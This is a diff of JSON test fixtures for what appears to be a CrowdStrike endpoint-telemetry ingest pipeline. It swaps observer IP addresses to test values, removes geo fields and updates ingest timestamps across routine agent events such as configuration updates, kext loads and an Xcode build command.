"{\"Parameter2\":\"0\",\"event_simpleName\":\"ErrorEvent\",\"Parameter1\":\"18446744072635810412\",\"Parameter3\":\"0\",\"ConfigStateHash\":\"1156120155\",\"aip\":\"67.43.156.14\",\"Line\":\"96\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"ErrorStatus\":\"3759276032\",\"name\":\"ErrorEventLinV1\",\"id\":\"ffffffff-1111-11eb-bdd3-0681aa29cecb\",\"Facility\":\"16778240\",\"aid\":\"ffffffffabd047b1a86c1fcd8ef22b59\",\"File\":\"0\",\"timestamp\":\"1625677530922\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:30.922Z", "kind": "alert", "action": "ErrorEvent", 
@@ -3270,21 +2843,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.24.60.146", - "vendor": "crowdstrike", - "ip": "208.24.60.146", "serial_number": "ffffffffa15a452190ae454f7d33e07e", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:30.590Z", "os": { 
@@ -3295,18 +2859,18 @@ }, "related": { "hosts": [ - "208.24.60.146" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.24.60.146" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465689200Z", - "original": "{\"event_simpleName\":\"ConfigStateUpdate\",\"ConfigStateHash\":\"3090255842\",\"ConfigStateData\":\"0,0,1007.4.0013701.1|1,2,1|1,4,a|1,6,0|1,8,46|1,a,1|1,c,0|1,17,1f|1,18,18|1,19,0|1,1e,407|1,21,3d2|1,27,1|1,53,18b|1,56,0|1,d0,16d|1,d1,0|1,d2,0|1,df,4c|1,e0,6|1,f6,1|1,1f5,1|1,1f7,1|1,1fd,1|1,200,0|2,0,138,a8000000032,140000000085,140000000153,18000000004c,18000000004f,180000000050,180000000051,180000000054,1800000000e1,1800000000e7,180000000144,18000000014e,18000000015a,18000000020e,180000000226,180000000227,180400000079,18040000009b,18040000009c,1804000000ff,180400000117,180400000118,180400000142,180400000163,180400000164,180400000166,180400000167,1804000001b2,1804000001f2,1804000001f3,180400000225,1804000002be,1804000002bf,1804000002ca,1804000002cb,1808000000c9,1808000000ee,1808000000fc,1808000000fd,1808000000fe,180c0000016b,180c0000016c,180c0000016d,180c0000016e,180c0000016f,180c00000170,180c000001b6,180c000001b7,180c000001b8,180c000001b9,180c000001f6,180c000001f7,180c000001f8,180c000002c2,180c000002c3,180c000002c4,180c000002ce,180c000002cf,180c000002d0,18100000011e,18100000011f,181000000120,181000000121,181000000122,181000000123,181000000124,181000000125,181000000126,181000000128,181000000169,18100000016a,181000000180,1810000001b1,1810000001c3,18100000021f,181000000220,18100000024e,18100000025b,181000000280,1810000002ad,1810000002d6,1810000002d7,1810000002f3,1c04000000a1,1c04000000a2,1c04000000a3,1c04000000a4,1c04000000a5,1c04000000a6,1c040000011a,1c040000011b,1c040000011c,1c0400000268,1c0400000269,1c040000026a,1c040000026c,1c040000026d,1c040000026e,1c0400000271,1c0400000272,1c0400000273,1c0400000275,1c0400000276,1c0400000277,1c040000028f,1c0400000290,1c0400000291,1c0400000293,1c0400000294,1c0400000295,1c0400000297,1c0400000298,
1c0400000299,1c040000029b,1c040000029c,1c040000029d,1c040000029f,1c04000002a0|3,0,65|\",\"aip\":\"208.24.60.146\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ConfigStateUpdateMacV2\",\"id\":\"ffffffff-1111-11eb-8dc4-0234c12f9875\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffa15a452190ae454f7d33e07e\",\"timestamp\":\"1625677530590\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150816600Z", + "original": "{\"event_simpleName\":\"ConfigStateUpdate\",\"ConfigStateHash\":\"3090255842\",\"ConfigStateData\":\"0,0,1007.4.0013701.1|1,2,1|1,4,a|1,6,0|1,8,46|1,a,1|1,c,0|1,17,1f|1,18,18|1,19,0|1,1e,407|1,21,3d2|1,27,1|1,53,18b|1,56,0|1,d0,16d|1,d1,0|1,d2,0|1,df,4c|1,e0,6|1,f6,1|1,1f5,1|1,1f7,1|1,1fd,1|1,200,0|2,0,138,a8000000032,140000000085,140000000153,18000000004c,18000000004f,180000000050,180000000051,180000000054,1800000000e1,1800000000e7,180000000144,18000000014e,18000000015a,18000000020e,180000000226,180000000227,180400000079,18040000009b,18040000009c,1804000000ff,180400000117,180400000118,180400000142,180400000163,180400000164,180400000166,180400000167,1804000001b2,1804000001f2,1804000001f3,180400000225,1804000002be,1804000002bf,1804000002ca,1804000002cb,1808000000c9,1808000000ee,1808000000fc,1808000000fd,1808000000fe,180c0000016b,180c0000016c,180c0000016d,180c0000016e,180c0000016f,180c00000170,180c000001b6,180c000001b7,180c000001b8,180c000001b9,180c000001f6,180c000001f7,180c000001f8,180c000002c2,180c000002c3,180c000002c4,180c000002ce,180c000002cf,180c000002d0,18100000011e,18100000011f,181000000120,181000000121,181000000122,181000000123,181000000124,181000000125,181000000126,181000000128,181000000169,18100000016a,181000000180,1810000001b1,1810000001c3,18100000021f,181000000220,18100000024e,18100000025b,181000000280,1810000002ad,1810000002d6,1810000002d7,1810000002f3,1c04000000a1,1c04000000a2,1c04000000a3,1c04000000a4,1c04000000a5,1c04000000a6,1c040000011a,1c040000011b
,1c040000011c,1c0400000268,1c0400000269,1c040000026a,1c040000026c,1c040000026d,1c040000026e,1c0400000271,1c0400000272,1c0400000273,1c0400000275,1c0400000276,1c0400000277,1c040000028f,1c0400000290,1c0400000291,1c0400000293,1c0400000294,1c0400000295,1c0400000297,1c0400000298,1c0400000299,1c040000029b,1c040000029c,1c040000029d,1c040000029f,1c04000002a0|3,0,65|\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ConfigStateUpdateMacV2\",\"id\":\"ffffffff-1111-11eb-8dc4-0234c12f9875\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffa15a452190ae454f7d33e07e\",\"timestamp\":\"1625677530590\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:30.590Z", "kind": "event", "action": "ConfigStateUpdate", @@ -3379,21 +2943,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.131.106.21", - "vendor": "crowdstrike", - "ip": "208.131.106.21", "serial_number": "ffffffffaa0e47a1b009aef151d6179d", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:09.064Z", "ecs": { 
@@ -3401,18 +2956,18 @@ }, "related": { "hosts": [ - "208.131.106.21" + "67.43.156.14" ], "hash": [ "1620585913" ], "ip": [ - "208.131.106.21" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465695900Z", - "original": "{\"event_simpleName\":\"KextLoad\",\"ContextTimeStamp\":\"1625677509.064\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364867547408058681\",\"ContextThreadId\":\"0\",\"aip\":\"208.131.106.21\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"BundleID\":\"com.apple.driver.AudioAUUC\",\"Entitlements\":\"15\",\"name\":\"KextLoadMacV1\",\"id\":\"ffffffff-1111-11eb-a2ae-028f6bf89be7\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffaa0e47a1b009aef151d6179d\",\"timestamp\":\"1625677509069\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150822900Z", + "original": "{\"event_simpleName\":\"KextLoad\",\"ContextTimeStamp\":\"1625677509.064\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364867547408058681\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"BundleID\":\"com.apple.driver.AudioAUUC\",\"Entitlements\":\"15\",\"name\":\"KextLoadMacV1\",\"id\":\"ffffffff-1111-11eb-a2ae-028f6bf89be7\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffaa0e47a1b009aef151d6179d\",\"timestamp\":\"1625677509069\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:09.069Z", "kind": "event", "action": "KextLoad", 
@@ -3432,25 +2987,16 @@ "EffectiveTransmissionClass": "2", "Entitlements": "15", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } - }, - { - "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.27.17.203", - "vendor": "crowdstrike", - "ip": "208.27.17.203", + } + }, + { + "observer": { "serial_number": "ffffffff67d54f7daf3d998ffc74d48e", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011110.1" + "version": "1007.8.0011110.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:07.901Z", "os": { 
@@ -3461,19 +3007,19 @@ }, "related": { "hosts": [ - "208.27.17.203" + "67.43.156.14" ], "hash": [ "3155796140" ], "ip": [ - "208.27.17.203" + "67.43.156.14" ] }, "event": { "action": "ChannelVersionRequired", - "ingested": "2021-11-22T09:23:55.465702600Z", - "original": "{\"ChannelVersion\":\"25\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"3155796140\",\"aip\":\"208.27.17.203\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"20\",\"ConfigBuild\":\"1007.8.0011110.1\",\"event_platform\":\"Lin\",\"name\":\"ChannelVersionRequiredLinV1\",\"id\":\"ffffffff-1111-11eb-b411-06baeacb7a63\",\"aid\":\"ffffffff67d54f7daf3d998ffc74d48e\",\"timestamp\":\"1625677507901\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150829300Z", + "original": "{\"ChannelVersion\":\"25\",\"event_simpleName\":\"ChannelVersionRequired\",\"ConfigStateHash\":\"3155796140\",\"aip\":\"67.43.156.14\",\"ChannelVersionRequired\":\"0\",\"ChannelId\":\"20\",\"ConfigBuild\":\"1007.8.0011110.1\",\"event_platform\":\"Lin\",\"name\":\"ChannelVersionRequiredLinV1\",\"id\":\"ffffffff-1111-11eb-b411-06baeacb7a63\",\"aid\":\"ffffffff67d54f7daf3d998ffc74d48e\",\"timestamp\":\"1625677507901\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b411-06baeacb7a63", "created": "2021-07-07T17:05:07.901Z" }, @@ -3519,21 +3065,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.203.151.21", - "vendor": "crowdstrike", - "ip": "208.203.151.21", "serial_number": "ffffffffe22549479fbe8293b6747a68", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011308.1" + "version": "1007.8.0011308.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:11.754Z", "ecs": { 
@@ -3541,19 +3078,19 @@ }, "related": { "hosts": [ - "208.203.151.21" + "67.43.156.14" ], "hash": [ "64e48365207d0c19008ba7d53d75c0de3fcd5a1590e4c40fc69c677663fedc20", "2037712541" ], "ip": [ - "208.203.151.21" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465709400Z", - "original": "{\"event_simpleName\":\"ProcessRollup2Stats\",\"ConfigStateHash\":\"2037712541\",\"Timeout\":\"60\",\"ParentProcessId\":\"0\",\"aip\":\"208.203.151.21\",\"SuppressType\":\"3\",\"SHA256HashData\":\"64e48365207d0c19008ba7d53d75c0de3fcd5a1590e4c40fc69c677663fedc20\",\"ProcessCount\":\"60\",\"BoundedCount\":\"57\",\"ConfigBuild\":\"1007.8.0011308.1\",\"UID\":\"115\",\"event_platform\":\"Lin\",\"CommandLine\":\"sh -c \\\"/usr/lib/erlang/erts-11.1.3/bin/epmd\\\" -daemon\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2StatsLinV3\",\"id\":\"ffffffff-1111-11eb-b34e-063f4cefccb3\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffe22549479fbe8293b6747a68\",\"timestamp\":\"1625677511754\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150835800Z", + "original": "{\"event_simpleName\":\"ProcessRollup2Stats\",\"ConfigStateHash\":\"2037712541\",\"Timeout\":\"60\",\"ParentProcessId\":\"0\",\"aip\":\"67.43.156.14\",\"SuppressType\":\"3\",\"SHA256HashData\":\"64e48365207d0c19008ba7d53d75c0de3fcd5a1590e4c40fc69c677663fedc20\",\"ProcessCount\":\"60\",\"BoundedCount\":\"57\",\"ConfigBuild\":\"1007.8.0011308.1\",\"UID\":\"115\",\"event_platform\":\"Lin\",\"CommandLine\":\"sh -c \\\"/usr/lib/erlang/erts-11.1.3/bin/epmd\\\" -daemon\",\"Entitlements\":\"15\",\"name\":\"ProcessRollup2StatsLinV3\",\"id\":\"ffffffff-1111-11eb-b34e-063f4cefccb3\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffe22549479fbe8293b6747a68\",\"timestamp\":\"1625677511754\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:11.754Z", "kind": "state", "action": "ProcessRollup2Stats", 
@@ -3592,21 +3129,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.165.30.176", - "vendor": "crowdstrike", - "ip": "208.165.30.176", "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:04:38.122Z", "ecs": { 
@@ -3617,18 +3145,18 @@ "user1" ], "hosts": [ - "208.165.30.176" + "67.43.156.13" ], "hash": [ "3967242894" ], "ip": [ - "208.165.30.176" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465718900Z", - "original": "{\"event_simpleName\":\"UserIdentity\",\"LoginSessionId\":\"1138166333440\",\"AuthenticationUuidAsString\":\"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109\",\"UserName\":\"user1\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"208.165.30.176\",\"AuthenticationId\":\"265\",\"UserPrincipal\":\"user1@dom1\",\"UserSid\":\"S-1-5-21-3852557355-3178143607-2040168074-1530\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"265\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"UserIdentityMacV4\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"AuthenticationUuid\":\"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109\",\"timestamp\":\"1625677478122\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150842Z", + "original": "{\"event_simpleName\":\"UserIdentity\",\"LoginSessionId\":\"1138166333440\",\"AuthenticationUuidAsString\":\"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109\",\"UserName\":\"user1\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"AuthenticationId\":\"265\",\"UserPrincipal\":\"user1@dom1\",\"UserSid\":\"S-1-5-21-3852557355-3178143607-2040168074-1530\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"265\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"UserIdentityMacV4\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"AuthenticationUuid\":\"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109\",\"timestamp\":\"1625677478122\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:38.122Z", "kind": "event", "action": "UserIdentity", 
@@ -3665,21 +3193,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.237.139.168", - "vendor": "crowdstrike", - "ip": "208.237.139.168", "serial_number": "ffffffff45d647e6ae0ba8764a4bd570", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:49.052Z", "os": { 
@@ -3690,20 +3209,20 @@ }, "related": { "hosts": [ - "208.237.139.168" + "67.43.156.14" ], "hash": [ "c89caf538788e6524bf4ae93194051f3389eecbc71e4793f12a2dc0368211cc2", "1620585913" ], "ip": [ - "208.237.139.168" + "67.43.156.14" ] }, "event": { "action": "DeliverLocalFXToCloud", - "ingested": "2021-11-22T09:23:55.465725800Z", - "original": "{\"FeatureVector\":\"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\",\"event_simpleName\":\"DeliverLocalFXToCloud\",\"ConfigStateHash\":\"1620585913\",\"aip\":\"208.237.139.168\",\"ModelPrediction\":\"1436899696705536\",\"SHA256HashData\":\"c89caf538788e6524bf4ae93194051f3389eecbc71e4793f12a2dc0368211cc2\",\"Malicious\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"FeatureExtractionVersion\":\"2\",\"event_platform\":\"Mac\",\"FXFileSize\":\"502032\",\"Entitlements\":\"15\",\"name\":\"DeliverLocalFXToCloudMacV4\",\"PupAdwareDecisionValue\":\"12384657383358464\",\"id\":\"ffffffff-1111-11eb-b44e-069a02b0ad6b\",\"PupAdwareConfidence\":\"0\",\"EffectiveTransmissionClass\":\"1\",\"aid\":\"ffffffff45d647e6ae0ba8764a4bd570\",\"MLModelVersion\":\"4\",\"timestamp\":\"1625677489052\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150848500Z", + "original": 
"{\"FeatureVector\":\"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\",\"event_simpleName\":\"DeliverLocalFXToCloud\",\"ConfigStateHash\":\"1620585913\",\"aip\":\"67.43.156.14\",\"ModelPrediction\":\"1436899696705536\",\"SHA256HashData\":\"c89caf538788e6524bf4ae93194051f3389eecbc71e4793f12a2dc0368211cc2\",\"Malicious\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"FeatureExtractionVersion\":\"2\",\"event_platform\":\"Mac\",\"FXFileSize\":\"502032\",\"Entitlements\":\"15\",\"name\":\"DeliverLocalFXToCloudMacV4\",\"PupAdwareDecisionValue\":\"12384657383358464\",\"id\":\"ffffffff-1111-11eb-b44e-069a02b0ad6b\",\"PupAdwareConfidence\":\"0\",\"EffectiveTransmissionClass\":\"1\",\"aid\":\"ffffffff45d647e6ae0ba8764a4bd570\",\"MLModelVersion\":\"4\",\"timestamp\":\"1625677489052\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b44e-069a02b0ad6b", "created": "2021-07-07T17:04:49.052Z" }, @@ -3768,21 +3287,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "Canada", - "location": { - "lon": -79.3716, - "lat": 43.6319 - }, - "country_iso_code": "CA" - }, - "address": "208.114.159.32", - "vendor": "crowdstrike", - "ip": "208.114.159.32", "serial_number": "ffffffffb3a3442585c05abc61e290fc", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:24.929Z", "file": { 
@@ -3796,18 +3306,18 @@ }, "related": { "hosts": [ - "208.114.159.32" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.114.159.32" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465732600Z", - "original": "{\"event_simpleName\":\"CreateProcessArgs\",\"ContextTimeStamp\":\"1625677524.929\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365035560818271291\",\"ContextThreadId\":\"365035560818271291\",\"aip\":\"208.114.159.32\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"CommandLine\":\"t.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/CategorySurfaceViewController.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationActionView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationAddressView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationErrorView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationHeaderView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationLoadingView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationPostalCodeView.o -o 
/Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationViewController.o -index-store-path /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Index/DataStore -index-system-modules\",\"Entitlements\":\"15\",\"name\":\"CreateProcessArgsMac\",\"id\":\"ffffffff-1111-11eb-8332-020506b18db5\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffb3a3442585c05abc61e290fc\",\"timestamp\":\"1625677525128\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/swift-frontend\"}", + "ingested": "2021-12-09T13:36:11.150854800Z", + "original": "{\"event_simpleName\":\"CreateProcessArgs\",\"ContextTimeStamp\":\"1625677524.929\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365035560818271291\",\"ContextThreadId\":\"365035560818271291\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"CommandLine\":\"t.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/CategorySurfaceViewController.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationActionView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationAddressView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationErrorView.o -o 
/Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationHeaderView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationLoadingView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationPostalCodeView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationViewController.o -index-store-path /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Index/DataStore -index-system-modules\",\"Entitlements\":\"15\",\"name\":\"CreateProcessArgsMac\",\"id\":\"ffffffff-1111-11eb-8332-020506b18db5\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffb3a3442585c05abc61e290fc\",\"timestamp\":\"1625677525128\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/swift-frontend\"}", "created": "2021-07-07T17:05:25.128Z", "kind": "state", "action": "CreateProcessArgs", 
@@ -3845,21 +3355,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.15.11.8", - "vendor": "crowdstrike", - "ip": "208.15.11.8", "serial_number": "ffffffffc4044541995bffd84b9df003", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:04:48.523Z", "file": { 
@@ -3874,18 +3375,18 @@ }, "related": { "hosts": [ - "208.15.11.8" + "67.43.156.13" ], "hash": [ "3090255842" ], "ip": [ - "208.15.11.8" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465739400Z", - "original": "{\"event_simpleName\":\"PdfFileWritten\",\"ContextTimeStamp\":\"1625677488.523\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364156540965623394\",\"ContextThreadId\":\"0\",\"aip\":\"208.15.11.8\",\"FileIdentifier\":\"05000001000000000000000000000000f1321d0000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"PdfFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-8903-022a1941b91f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffc4044541995bffd84b9df003\",\"timestamp\":\"1625677488576\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/pt/s9pzbbwd07q_0fxqvfhc513r0000gp/T/com.microsoft.Excel/Content.MSO/mso6ACABA95\"}", + "ingested": "2021-12-09T13:36:11.150861Z", + "original": "{\"event_simpleName\":\"PdfFileWritten\",\"ContextTimeStamp\":\"1625677488.523\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364156540965623394\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"FileIdentifier\":\"05000001000000000000000000000000f1321d0000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"PdfFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-8903-022a1941b91f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffc4044541995bffd84b9df003\",\"timestamp\":\"1625677488576\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/pt/s9pzbbwd07q_0fxqvfhc513r0000gp/T/com.microsoft.Excel/Content.MSO/mso6ACABA95\"}", "created": "2021-07-07T17:04:48.576Z", "kind": "event", "action": "PdfFileWritten", 
